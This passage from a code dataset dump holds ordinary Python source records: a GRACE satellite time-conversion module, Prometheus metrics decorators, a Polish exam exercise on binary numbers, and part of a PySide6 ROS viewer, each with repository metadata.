since yyyy-mm-dd hh:mm:ss\n\n Arguments\n ---------\n date_string: time-units since yyyy-mm-dd hh:mm:ss\n\n Returns\n -------\n epoch of delta time\n multiplication factor to convert to seconds\n \"\"\"\n #-- try parsing the original date string as a date\n try:\n epoch = dateutil.parser.parse(date_string)\n except ValueError:\n pass\n else:\n #-- return the epoch (as list)\n return (datetime_to_list(epoch),0.0)\n #-- split the date string into units and epoch\n units,epoch = split_date_string(date_string)\n conversion_factors = {'microseconds': 1e-6,'microsecond': 1e-6,\n 'microsec': 1e-6,'microsecs': 1e-6,\n 'milliseconds': 1e-3,'millisecond': 1e-3,'millisec': 1e-3,\n 'millisecs': 1e-3,'msec': 1e-3,'msecs': 1e-3,'ms': 1e-3,\n 'seconds': 1.0,'second': 1.0,'sec': 1.0,'secs': 1.0,'s': 1.0,\n 'minutes': 60.0,'minute': 60.0,'min': 60.0,'mins': 60.0,\n 'hours': 3600.0,'hour': 3600.0,'hr': 3600.0,\n 'hrs': 3600.0,'h': 3600.0,\n 'day': 86400.0,'days': 86400.0,'d': 86400.0}\n if units not in conversion_factors.keys():\n raise ValueError('Invalid units: {0}'.format(units))\n #-- return the epoch (as list) and the time unit conversion factors\n return (datetime_to_list(epoch),conversion_factors[units])\n\n#-- PURPOSE: split a date string into units and epoch\ndef split_date_string(date_string):\n \"\"\"\n split a date string into units and epoch\n\n Arguments\n ---------\n date_string: time-units since yyyy-mm-dd hh:mm:ss\n \"\"\"\n try:\n units,_,epoch = date_string.split(None,2)\n except ValueError:\n raise ValueError('Invalid format: {0}'.format(date_string))\n else:\n return (units.lower(),dateutil.parser.parse(epoch))\n\n#-- PURPOSE: convert a datetime object into a list\ndef datetime_to_list(date):\n \"\"\"\n convert a datetime object into a list [year,month,day,hour,minute,second]\n\n Arguments\n ---------\n date: datetime object\n \"\"\"\n return [date.year,date.month,date.day,date.hour,date.minute,date.second]\n\n#-- PURPOSE: Adjust GRACE/GRACE-FO months to fix \"Special Cases\"\ndef adjust_months(grace_month):\n \"\"\"\n Adjust estimated GRACE/GRACE-FO months to fix \"Special Cases\"\n\n Arguments\n ---------\n grace_month: GRACE/GRACE-FO months\n\n The \"Special Months\" (Nov 2011, Dec 2011 and April 2012) with\n Accelerometer shutoffs make the 
relation between month number\n and date more complicated as days from other months are used\n For CSR and GFZ: Nov 2011 (119) is centered in Oct 2011 (118)\n For JPL: Dec 2011 (120) is centered in Jan 2012 (121)\n For all: May 2015 (161) is centered in Apr 2015 (160)\n For GSFC: Oct 2018 (202) is centered in Nov 2018 (203)\n \"\"\"\n #-- verify dimensions\n grace_month = np.atleast_1d(grace_month)\n #-- number of months\n nmon = len(grace_month)\n #-- create temporary months object\n m = np.zeros_like(grace_month)\n #-- find unique months\n _,i,c = np.unique(grace_month,return_inverse=True,return_counts=True)\n #-- simple unique months case\n case1, = np.nonzero(c[i] == 1)\n m[case1] = grace_month[case1]\n #-- Special Months cases\n case2, = np.nonzero(c[i] == 2)\n #-- for each special case month\n for j in case2:\n # prior month, current month, subsequent 2 months\n mm1 = grace_month[j-1]\n mon = grace_month[j]\n mp1 = grace_month[j+1] if (j < (nmon-1)) else (mon + 1)\n mp2 = grace_month[j+2] if (j < (nmon-2)) else (mp1 + 1)\n #-- determine the months which meet the criteria need to be adjusted\n if (mon == (mm1 + 1)):\n #-- case where month is correct\n #-- but subsequent month needs to be +1\n m[j] = np.copy(grace_month[j])\n elif (mon == mm1) and (mon != m[j-1]):\n #-- case where prior month needed to be -1\n #-- but current month is correct\n m[j] = np.copy(grace_month[j])\n elif (mon == mm1):\n #-- case where month should be +1\n m[j] = grace_month[j] + 1\n elif (mon == mp1) and ((mon == (mm1 + 2)) or (mp2 == (mp1 + 1))):\n #-- case where month should be -1\n m[j] = grace_month[j] - 1\n #-- update months and remove singleton dimensions if necessary\n return np.squeeze(m)\n\n#-- PURPOSE: convert calendar dates to GRACE/GRACE-FO months\ndef calendar_to_grace(year,month=1,around=np.floor):\n \"\"\"\n Converts calendar dates to GRACE/GRACE-FO months\n\n Arguments\n ---------\n year: calendar year\n\n Keyword arguments\n -----------------\n month: calendar month\n around: method of rounding to nearest method\n\n Returns\n -------\n grace_month: GRACE/GRACE-FO month\n \"\"\"\n grace_month = around(12.0*(year - 2002.0)) + month\n return np.array(grace_month,dtype=int)\n\n#-- PURPOSE: convert GRACE/GRACE-FO months to calendar dates\ndef grace_to_calendar(grace_month):\n \"\"\"\n Converts GRACE/GRACE-FO months to calendar dates\n\n Arguments\n ---------\n grace_month: GRACE/GRACE-FO month\n\n Returns\n -------\n year: calendar year\n month: calendar month\n \"\"\"\n year = np.array(2002 + (grace_month-1)//12).astype(int)\n month = np.mod(grace_month-1,12) + 1\n return (year, month)\n\n#-- PURPOSE: convert calendar dates to Julian days\ndef calendar_to_julian(year_decimal):\n \"\"\"\n Converts calendar dates to Julian days\n\n Arguments\n ---------\n year: calendar year\n\n Returns\n -------\n JD: Julian Day (days since 01-01-4713 BCE at 12:00:00)\n \"\"\"\n #-- calculate year\n year = np.floor(year_decimal)\n #-- calculation of day of the year\n dpy = calendar_days(year).sum()\n DofY = dpy*(year_decimal % 1)\n #-- Calculation of the Julian date from year and DofY\n JD = np.array(367.0*year - np.floor(7.0*year/4.0) -\n np.floor(3.0*(np.floor((7.0*year - 1.0)/700.0) + 1.0)/4.0) +\n DofY + 1721058.5, dtype=np.float64)\n return JD\n\n#-- PURPOSE: gets the number of days per month for a given year\ndef calendar_days(year):\n \"\"\"\n Calculates the number of days per month for a given year\n\n Arguments\n ---------\n year: calendar year\n\n Returns\n -------\n dpm: number of days for each month\n 
\"\"\"\n #-- days per month in a leap and a standard year\n #-- only difference is February (29 vs. 28)\n dpm_leap = np.array([31,29,31,30,31,30,31,31,30,31,30,31],dtype=np.float64)\n dpm_stnd = np.array([31,28,31,30,31,30,31,31,30,31,30,31],dtype=np.float64)\n #-- Rules in the Gregorian calendar for a year to be a leap year:\n #-- divisible by 4, but not by 100 unless divisible by 400\n #-- True length of the year is about 365.2422 days\n #-- Adding a leap day every four years ==> average 365.25\n #-- Subtracting a leap year every 100 years ==> average 365.24\n #-- Adding a leap year back every 400 years ==> average 365.2425\n #-- Subtracting a leap year every 4000 years ==> average 365.24225\n m4 = (year % 4)\n m100 = (year % 100)\n m400 = (year % 400)\n m4000 = (year % 4000)\n #-- find indices for standard years and leap years using criteria\n if ((m4 == 0) & (m100 != 0) | (m400 == 0) & (m4000 != 0)):\n return dpm_leap\n elif ((m4 != 0) | (m100 == 0) & (m400 != 0) | (m4000 == 0)):\n return dpm_stnd\n\n#-- PURPOSE: convert times from seconds since epoch1 to time since epoch2\ndef convert_delta_time(delta_time, epoch1=None, epoch2=None, scale=1.0):\n \"\"\"\n Convert delta time from seconds since epoch1 to time since epoch2\n\n Arguments\n ---------\n delta_time: seconds since epoch1\n\n Keyword arguments\n -----------------\n epoch1: epoch for input delta_time\n epoch2: epoch for output delta_time\n scale: scaling factor for converting time to output units\n \"\"\"\n epoch1 = datetime.datetime(*epoch1)\n epoch2 = datetime.datetime(*epoch2)\n delta_time_epochs = (epoch2 - epoch1).total_seconds()\n #-- subtract difference in time and rescale to output units\n return scale*(delta_time - delta_time_epochs)\n\n#-- PURPOSE: calculate the delta time from calendar date\n#-- http://scienceworld.wolfram.com/astronomy/JulianDate.html\ndef convert_calendar_dates(year, month, day, hour=0.0, minute=0.0, second=0.0,\n epoch=(1992,1,1,0,0,0), scale=1.0):\n \"\"\"\n Calculate the time in time units since epoch from calendar dates\n\n Arguments\n ---------\n year: calendar month\n month: month of the year\n day: day of the month\n\n Keyword arguments\n -----------------\n hour: hour of the day\n minute: minute of the hour\n second: second of the minute\n epoch: epoch for output delta_time\n scale: scaling factor for converting days to output units\n\n Returns\n -------\n delta_time: days since epoch\n \"\"\"\n #-- calculate date in Modified Julian Days (MJD) from calendar date\n #-- MJD: days since November 17, 1858 (1858-11-17T00:00:00)\n MJD = 367.0*year - np.floor(7.0*(year + np.floor((month+9.0)/12.0))/4.0) - \\\n np.floor(3.0*(np.floor((year + (month - 9.0)/7.0)/100.0) + 1.0)/4.0) + \\\n np.floor(275.0*month/9.0) + day + hour/24.0 + minute/1440.0 + \\\n second/86400.0 + 1721028.5 - 2400000.5\n epoch1 = datetime.datetime(1858,11,17,0,0,0)\n epoch2 = datetime.datetime(*epoch)\n delta_time_epochs = (epoch2 - epoch1).total_seconds()\n #-- return the date in days since epoch (or scaled to units)\n return scale*np.array(MJD - delta_time_epochs/86400.0,dtype=np.float64)\n\n#-- PURPOSE: Converts from calendar dates into decimal years\ndef convert_calendar_decimal(year, month, day=None, hour=None, minute=None,\n second=None, DofY=None):\n \"\"\"\n Converts from calendar date into decimal years taking into\n account leap years\n\n Dershowitz, N. and E.M. Reingold. 2008. 
Calendrical Calculations.\n Cambridge: Cambridge University Press.\n\n Arguments\n ---------\n year: calendar year\n month: calendar month\n\n Keyword arguments\n -----------------\n day: day of the month\n hour: hour of the day\n minute: minute of the hour\n second: second of the minute\n DofY: day of the year (January 1 = 1)\n\n Returns\n -------\n t_date: date in decimal-year format\n \"\"\"\n\n #-- number of dates\n n_dates = len(np.atleast_1d(year))\n\n #-- create arrays for calendar date variables\n cal_date = {}\n cal_date['year'] = np.zeros((n_dates))\n cal_date['month'] = np.zeros((n_dates))\n cal_date['day'] = np.zeros((n_dates))\n cal_date['hour'] = np.zeros((n_dates))\n cal_date['minute'] = np.zeros((n_dates))\n cal_date['second'] = np.zeros((n_dates))\n #-- day of the year\n cal_date['DofY'] = np.zeros((n_dates))\n\n #-- remove singleton dimensions and use year and month\n cal_date['year'][:] = np.squeeze(year)\n cal_date['month'][:] = np.squeeze(month)\n\n #-- create output date variable\n t_date = np.zeros((n_dates))\n\n #-- days per month in a leap and a standard year\n #-- only difference is February (29 vs. 28)\n dpm_leap=np.array([31,29,31,30,31,30,31,31,30,31,30,31], dtype=np.float64)\n dpm_stnd=np.array([31,28,31,30,31,30,31,31,30,31,30,31], dtype=np.float64)\n\n #-- Rules in the Gregorian calendar for a year to be a leap year:\n #-- divisible by 4, but not by 100 unless divisible by 400\n #-- True length of the year is about 365.2422 days\n #-- Adding a leap day every four years ==> average 365.25\n #-- Subtracting a leap year every 100 years ==> average 365.24\n #-- Adding a leap year back every 400 years ==> average 365.2425\n #-- Subtracting a leap year every 4000 years ==> average 365.24225\n m4 = (cal_date['year'] % 4)\n m100 = (cal_date['year'] % 100)\n m400 = (cal_date['year'] % 400)\n m4000 = (cal_date['year'] % 4000)\n #-- find indices for standard years and leap years using criteria\n leap, = np.nonzero((m4 == 0) & (m100 != 0) | (m400 == 0) & (m4000 != 0))\n stnd, = np.nonzero((m4 != 0) | (m100 == 0) & (m400 != 0) | (m4000 == 0))\n\n #-- calculate the day of the year\n if DofY is not None:\n #-- if entered directly as an input\n #-- remove 1 so day 1 (Jan 1st) = 0.0 in decimal format\n cal_date['DofY'][:] = np.squeeze(DofY)-1\n else:\n #-- use calendar month and day of the month to calculate day of the year\n #-- month minus 1: January = 0, February = 1, etc (indice of month)\n #-- in decimal form: January = 0.0\n month_m1 = np.array(cal_date['month'],dtype=np.int64) - 1\n\n #-- day of month\n if day is not None:\n #-- remove 1 so 1st day of month = 0.0 in decimal format\n cal_date['day'][:] = np.squeeze(day)-1.0\n else:\n #-- if not entering days as an input\n #-- will use the mid-month value\n cal_date['day'][leap] = dpm_leap[month_m1[leap]]/2.0\n cal_date['day'][stnd] = dpm_stnd[month_m1[stnd]]/2.0\n\n #-- create matrix with the lower half = 1\n #-- this matrix will be used in a matrix multiplication\n #-- to calculate the total number of days for prior months\n #-- the -1 will make the diagonal == 0\n #-- i.e. 
first row == all zeros and the\n #-- last row == ones for all but the last element\n mon_mat=np.tri(12,12,-1)\n #-- using a dot product to calculate total number of days\n #-- for the months before the input date\n #-- basically is sum(i*dpm)\n #-- where i is 1 for all months < the month of interest\n #-- and i is 0 for all months >= the month of interest\n #-- month of interest is zero as the exact days will be\n #-- used to calculate the date\n\n #-- calculate the day of the year for leap and standard\n #-- use total days of all months before date\n #-- and add number of days before date in month\n cal_date['DofY'][stnd] = cal_date['day'][stnd] + \\\n np.dot(mon_mat[month_m1[stnd],:],dpm_stnd)\n cal_date['DofY'][leap] = cal_date['day'][leap] + \\\n np.dot(mon_mat[month_m1[leap],:],dpm_leap)\n\n #-- hour of day (else is zero)\n if hour is not None:\n cal_date['hour'][:] = np.squeeze(hour)\n\n #-- minute of hour (else is zero)\n if minute is not None:\n cal_date['minute'][:] = np.squeeze(minute)\n\n #-- second in minute (else is zero)\n if second is not None:\n cal_date['second'][:] = np.squeeze(second)\n\n #-- calculate decimal date\n #-- convert hours, minutes and seconds into days\n #-- convert calculated fractional days into decimal fractions of the year\n #-- Leap years\n t_date[leap] = cal_date['year'][leap] + \\\n (cal_date['DofY'][leap] + cal_date['hour'][leap]/24. + \\\n cal_date['minute'][leap]/1440. + \\\n cal_date['second'][leap]/86400.)/np.sum(dpm_leap)\n #-- Standard years\n t_date[stnd] = cal_date['year'][stnd] + \\\n (cal_date['DofY'][stnd] + cal_date['hour'][stnd]/24. + \\\n cal_date['minute'][stnd]/1440. + \\\n cal_date['second'][stnd]/86400.)/np.sum(dpm_stnd)\n\n return t_date\n\n#-- PURPOSE: Converts from Julian day to calendar date and time\ndef convert_julian(JD, ASTYPE=None, FORMAT='dict'):\n \"\"\"\n Converts from Julian day to calendar date and time\n\n Translated from caldat in \"Numerical Recipes in C\", by William H. Press,\n Brian P. Flannery, Saul A. Teukolsky, and William T. Vetterling.\n Cambridge University Press, 1988 (second printing).\n Hatcher, D. 
A., \"Simple Formulae for Julian Day Numbers and Calendar Dates\",\n Quarterly Journal of the Royal Astronomical Society, 25(1), 1984.\n\n\n Arguments\n ---------\n JD: Julian Day (days since 01-01-4713 BCE at 12:00:00)\n\n Keyword arguments\n -----------------\n ASTYPE: convert output to variable type\n FORMAT: format of output variables\n 'dict': dictionary with variable keys\n 'tuple': tuple with variable order YEAR,MONTH,DAY,HOUR,MINUTE,SECOND\n 'zip': aggregated variable sets\n\n Returns\n -------\n year: calendar year\n month: calendar month\n day: day of the month\n hour: hour of the day\n minute: minute of the hour\n second: second of the minute\n \"\"\"\n\n #-- convert to array if only a single value was imported\n if (np.ndim(JD) == 0):\n JD = np.atleast_1d(JD)\n SINGLE_VALUE = True\n else:\n SINGLE_VALUE = False\n\n JDO = np.floor(JD + 0.5)\n C = np.zeros_like(JD)\n #-- calculate C for dates before and after the switch to Gregorian\n IGREG = 2299161.0\n ind1, = np.nonzero(JDO < IGREG)\n C[ind1] = JDO[ind1] + 1524.0\n ind2, = np.nonzero(JDO >= IGREG)\n B = np.floor((JDO[ind2] - 1867216.25)/36524.25)\n C[ind2] = JDO[ind2] + B - np.floor(B/4.0) + 1525.0\n #-- calculate coefficients for date conversion\n D = np.floor((C - 122.1)/365.25)\n E = np.floor((365.0 * D) + np.floor(D/4.0))\n F = np.floor((C - E)/30.6001)\n #-- calculate day, month, year and hour\n DAY = np.floor(C - E + 0.5) - np.floor(30.6001*F)\n MONTH = F - 1.0 - 12.0*np.floor(F/14.0)\n YEAR = D - 4715.0 - np.floor((7.0+MONTH)/10.0)\n HOUR = np.floor(24.0*(JD + 0.5 - JDO))\n #-- calculate minute and second\n G = (JD + 0.5 - JDO) - HOUR/24.0\n MINUTE = np.floor(G*1440.0)\n SECOND = (G - MINUTE/1440.0) * 86400.0\n\n #-- convert all variables to output type (from float)\n if ASTYPE is not None:\n YEAR = YEAR.astype(ASTYPE)\n MONTH = MONTH.astype(ASTYPE)\n DAY = DAY.astype(ASTYPE)\n HOUR = HOUR.astype(ASTYPE)\n MINUTE = MINUTE.astype(ASTYPE)\n SECOND = SECOND.astype(ASTYPE)\n\n #-- if only a single value was imported initially: remove singleton dims\n if SINGLE_VALUE:\n YEAR = YEAR.item(0)\n MONTH = MONTH.item(0)\n DAY = DAY.item(0)\n HOUR = HOUR.item(0)\n MINUTE = MINUTE.item(0)\n SECOND = SECOND.item(0)\n\n #-- return date variables in output format (default python dictionary)\n if (FORMAT == 'dict'):\n return dict(year=YEAR, month=MONTH, day=DAY,\n hour=HOUR, minute=MINUTE, second=SECOND)\n elif (FORMAT == 'tuple'):\n return (YEAR, MONTH, DAY, HOUR, MINUTE, SECOND)\n elif (FORMAT == 'zip'):\n return zip(YEAR, MONTH, DAY, HOUR, MINUTE, SECOND)\n", "repo_name": "geodeepak/GRACE_HYDL", "sub_path": "gravity_toolkit/time.py", "file_name": "time.py", "file_ext": "py", "file_size_in_byte": 19484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dateutil.parser.parser.parse", "line_number": 45, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 45, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 45, "usage_type": "name"}, {"api_name": "dateutil.parser.parser.parse", "line_number": 81, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 81, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 81, "usage_type": "name"}, {"api_name": "numpy.atleast_1d", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 118, "usage_type": "call"}, {"api_name": 
"numpy.nonzero", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 150, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 209, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 227, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 228, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 261, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 296, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 298, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 302, "usage_type": "attribute"}, {"api_name": "numpy.atleast_1d", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 337, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 341, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 355, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 356, "usage_type": "attribute"}, {"api_name": "numpy.nonzero", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 382, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.tri", "line_number": 400, "usage_type": 
"call"}, {"api_name": "numpy.dot", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.ndim", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 481, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 486, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 490, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 493, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 494, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 497, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 500, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 501, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 502, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 503, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 506, "usage_type": "call"}]}
+{"seq_id": "26526599687", "text": "import time\nimport socket\nfrom functools import wraps\n\nfrom prometheus_client import Gauge, Histogram, Counter\n\n\nHOST_NAME = socket.gethostname()\n\n\ndef setup_histogram(*histograms):\n def wrapper(func):\n @wraps(func)\n def _wrapper(*args, **kwargs):\n start = time.time()\n try:\n return func(*args, **kwargs)\n finally:\n for h in histograms:\n h.labels(hostname=HOST_NAME).observe(time.time() - start)\n\n return _wrapper\n\n return wrapper\n\n\ndef setup_counter(*counters):\n def wrapper(func):\n @wraps(func)\n def _wrapper(*args, **kwargs):\n for c in counters:\n c.inc(1)\n return func(*args, **kwargs)\n\n return _wrapper\n\n return wrapper\n\n\n# taskflow metrics\nTASKFLOW_TIMEOUT_NODES_NUMBER = Gauge(\n \"taskflow_timeout_nodes_number\", \"amount of timeout nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_RUNNING_NODES_NUMBER = Gauge(\n \"taskflow_running_nodes_number\", \"amount of running nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_TIMEOUT_NODES_SCANNING_TIME = Histogram(\n \"taskflow_timeout_nodes_scanning_time\", \"time to scan timeout nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_TIMEOUT_NODES_PROCESSING_TIME = Histogram(\n \"taskflow_timeout_nodes_processing_time\", \"time to process timeout nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_NODE_AUTO_RETRY_TASK_DURATION = Histogram(\n \"taskflow_node_auto_retry_task_duration\", \"time to process node auto retry task\", labelnames=[\"hostname\"]\n)\nTASKFLOW_NODE_AUTO_RETRY_LOCK_ACCUIRE_FAIL = Counter(\n \"taskflow_node_auto_retry_lock_accuire_fail\", \"node auto retry lock fetch fail count\", labelnames=[\"hostname\"]\n)\n", "repo_name": "TencentBlueKing/bk-sops", "sub_path": "metrics.py", "file_name": "metrics.py", "file_ext": "py", "file_size_in_byte": 1718, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1001, "dataset": "github-code", "pt": "53", "api": [{"api_name": "socket.gethostname", "line_number": 8, "usage_type": "call"}, {"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 20, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 13, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 29, "usage_type": "call"}, {"api_name": "prometheus_client.Gauge", "line_number": 41, "usage_type": "call"}, {"api_name": "prometheus_client.Gauge", "line_number": 44, "usage_type": "call"}, {"api_name": "prometheus_client.Histogram", "line_number": 47, "usage_type": "call"}, {"api_name": "prometheus_client.Histogram", "line_number": 50, "usage_type": "call"}, {"api_name": "prometheus_client.Histogram", "line_number": 53, "usage_type": "call"}, {"api_name": "prometheus_client.Counter", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "19812397452", "text": "# Arkusz: https://cke.gov.pl/images/_EGZAMIN_MATURALNY_OD_2015/Arkusze_egzaminacyjne/2015/formula_od_2015/MIN-R2_1P-152.pdf\n# Wyniki: https://cke.gov.pl/images/_EGZAMIN_MATURALNY_OD_2015/Arkusze_egzaminacyjne/2015/formula_od_2015/odpowiedzi/MIN-R1-N.pdf\nfrom collections import Counter\n\n\ndef wczytaj(nazwa):\n with open(nazwa) as plik:\n # return list(map(str.strip, plik)) # SKRÓTOWIEC\n\n wynik = []\n for linia in plik:\n wynik.append(linia.strip())\n return wynik\n\n\ndef przezerowane(liczby):\n # return sum(1 for i in liczby if Counter(i).most_common(1)[0][0] == '0') # SKRÓTOWIEC\n\n suma = 0\n for i in liczby:\n if Counter(i).most_common(1)[0][0] == \"0\":\n suma += 1\n return suma\n\n\ndef podzielne(liczby):\n przez_2 = 0\n przez_8 = 0\n for liczba in liczby:\n if liczba[-1] == \"0\":\n przez_2 += 1\n if liczba[-3:] == \"000\":\n przez_8 += 1\n\n return {\"2\": przez_2, \"8\": przez_8}\n\n\ndef gdzie_minmax(liczby):\n # algorytmicznie suboptymalne, ale bardziej idiomatyczne\n pomocnik = [int(i, 2) for i in liczby]\n gdzie_min = pomocnik.index(min(pomocnik))\n gdzie_max = pomocnik.index(max(pomocnik))\n return gdzie_min, gdzie_max\n\n\nif __name__ == \"__main__\":\n liczby = wczytaj(\"liczby.txt\")\n\n wynik = podzielne(liczby)\n gdzie_min, gdzie_max = gdzie_minmax(liczby)\n\n print(f\"Liczb mających więcej zer niż jedynek: {przezerowane(liczby)}.\")\n print(f\"Liczb podzielnych przez 2: {wynik['2']}.\")\n print(f\"Liczb podzielnych przez 8: {wynik['8']}.\")\n print(\n f\"Najmniejsza liczba znajduje się w wierszu {gdzie_min + 1}\"\n ) # bo w życiu liczymy od 1\n print(f\"Największa liczba znajduje się w wierszu {gdzie_max + 1}\")\n", "repo_name": "dekoza/pymatura", "sub_path": "N_2015/zad4.py", "file_name": "zad4.py", "file_ext": "py", "file_size_in_byte": 1765, "program_lang": "python", "lang": "pl", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.Counter", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "31287668350", "text": "import sys\nimport os\n\nfrom PySide6.QtCore import QUrl, Signal\nfrom PySide6.QtWidgets import QApplication, QMainWindow\nfrom PySide6.QtWebChannel import QWebChannel\nfrom PySide6.QtWebEngineWidgets import QWebEngineView\n\nfrom .ros_handler import ROS2Thread, SignalHandler\nfrom .backend import Backend\n\nclass MainWindow(QMainWindow):\n def __init__(self) -> None:\n super().__init__()\n\n self.setWindowTitle('ROSTron Viewer')\n\n # Field\n self.web = QWebEngineView(self)\n self.channel = QWebChannel()\n self.web.page().setWebChannel(self.channel)\n self.backend = Backend()\n self.channel.registerObject(\"backend\", self.backend)\n\n url = QUrl.fromLocalFile(os.path.join(\n os.path.dirname(__file__), \"index.html\"))\n self.web.load(url)\n self.setCentralWidget(self.web)\n\n # ROS2 Thread\n self.ros_thread = ROS2Thread(parent=self)\n self.ros_thread.start()\n\n # Signal Handler\n SignalHandler().field.connect(self.backend.set_field)\n SignalHandler().ball.connect(self.backend.set_ball)\n SignalHandler().yellow.connect(self.backend.set_yellow)\n SignalHandler().allies.connect(self.backend.set_allies)\n SignalHandler().opponents.connect(self.backend.set_opponents)\n SignalHandler().add_annotation.connect(self.backend.add_annotation)\n SignalHandler().del_annotation.connect(self.backend.del_annotation)\n\n\n\ndef main():\n app = QApplication(sys.argv)\n w = MainWindow()\n w.showMaximized()\n app.exec()\n", "repo_name": "NAELIC/rostron_viewer", "sub_path": "rostron_viewer/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PySide6.QtWidgets.QMainWindow", "line_number": 12, "usage_type": "name"}, {"api_name": "PySide6.QtWebEngineWidgets.QWebEngineView", "line_number": 19, "usage_type": "call"}, {"api_name": "PySide6.QtWebChannel.QWebChannel", "line_number": 20, "usage_type": "call"}, {"api_name": "backend.Backend", "line_number": 22, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QUrl.fromLocalFile", "line_number": 25, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QUrl", "line_number": 25, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ros_handler.ROS2Thread", "line_number": 31, "usage_type": 